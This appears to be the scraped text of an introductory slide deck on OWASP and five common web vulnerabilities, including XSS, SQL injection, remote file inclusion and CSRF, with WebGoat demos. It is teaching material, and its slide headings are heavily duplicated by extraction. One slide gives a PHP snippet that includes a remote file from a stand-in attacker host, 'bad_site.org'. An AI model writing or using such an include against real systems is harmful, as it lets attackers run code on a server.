View
2.773
Download
1
Category
Tags:
Preview:
DESCRIPTION
Introduction of OWASP, OWASP Top 5, Network Security vs App Security and demos with webgoat.
Citation preview
Hacker’s SecretsHacker’s SecretsSharmishtha Guptasharmishtha.gupta@gmail.com
AgendaAgendaWhat is OWASP?Web security vs Network securityOWASP Top 5
◦XSS◦Sql Injection◦Malicious File Execution◦Insecure Direct Object Reference◦Cross Site Request Forgery (CSRF)
What is OWASP?What is OWASP?Web security vs Network securityWeb security vs Network security
OWASP Top 5OWASP Top 5
Open Web Application Security Project
Mission: An open community focused on web application security
What is OWASP?What is OWASP?Web security vs Network securityWeb security vs Network security
OWASP Top 5OWASP Top 5
Global Community
Local Bangalore Chapter: http://www.owasp.org/index.php/Bangalore
Open source projects and tools to improve web application security
Open learning resources and forum on web security
What is OWASP?What is OWASP?Web security vs Network securityWeb security vs Network security
OWASP Top 5OWASP Top 5
Attacker Web Server
Network Security
• Challenge is to restrict access to network and network resources (servers)• To protect data being exchanged over network from eavesdroppers• Mostly network layer stuff (packet filtering, firewalls etc)
What is OWASP? What is OWASP? Web security vs Network securityWeb security vs Network security
OWASP Top 5OWASP Top 5
Compromised Web Server Victim
Web Security
• Network is already accessible on port 80 (or other webserver port)
• Challenge is to protect other network resources which are not exposed, e.g. information stored in db, other backend information
What is OWASP?What is OWASP?Web security vs Network securityWeb security vs Network security
OWASP Top 5OWASP Top 5
Top 5 webapp vulnerabilities◦XSS◦Sql Injection◦Malicious File Execution◦Insecure Direct Object Reference◦Cross Site Request Forgery (CSRF)
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRFCross Site Request Forgery (CSRF))
When user provided data is used without validation and/or encoding
An attacker can execute a script in victim’s browser and hijack important user information without her knowing
Ex: Alice sends a scrap to Bob on Orkut with a scriptlet. When Bob opens his scrapbook, everyone in his
network is sent spam scraps posing as Bob by the scriptlet.
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRFCross Site Request Forgery (CSRF))
A real example is “Samy worm” on MySpace.com discovered in October, 2005http://namb.la/popular/tech.ht
mlDemo
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRF)Cross Site Request Forgery (CSRF)
When user provided data is sent to an interpreter (here sql) as part of a command or query
An attacker can trick the interpreter into executing unintended commands or changing data
Demo
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRF)Cross Site Request Forgery (CSRF)
When user provided input is used for executing a remote code or loading local files
Allows attackers to include hostile code and data; can totally compromise the server
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRF)Cross Site Request Forgery (CSRF)
Most common sources of code injection are:◦ Dynamic paths/files used in require/include
statements◦ eval(): A major source of code injection is
the improper validation of eval() using user provided inputs.
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRF)Cross Site Request Forgery (CSRF)
<?php//dynamic path$_GET['path'] =
‘http://bad_site.org’;include
"$_GET[‘path’]/header.inc"; ?>
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRF)Cross Site Request Forgery (CSRF)
If a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter
Attackers can manipulate those references to access other objects without authorization
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRF)Cross Site Request Forgery (CSRF)
Poor error handling is the main cause
Demos◦ Bad file inclusion◦ Sql connect failure
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRF)Cross Site Request Forgery (CSRF)
An attack that forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application
This can be as powerful as the web application that it attacks
XSSXSSSql InjectionSql Injection
Malicious File ExecutionMalicious File ExecutionInsecure Direct Object ReferenceInsecure Direct Object Reference
Cross Site Request Forgery (CSRF)Cross Site Request Forgery (CSRF)
Mostly when source of request is not validated
Gmail change password CSRF vulnerability disclosed by Vicente on 3rd Mar 2009◦ http://seclists.org/fulldisclosure/200
9/Mar/0029.htmlDemo
VisitVisitWebgoat from OWASP
◦Good to solve the puzzles by learning vulnerabilities
◦Good hints and solutions◦Download from
http://code.google.com/p/webgoat/downloads/list
Recommended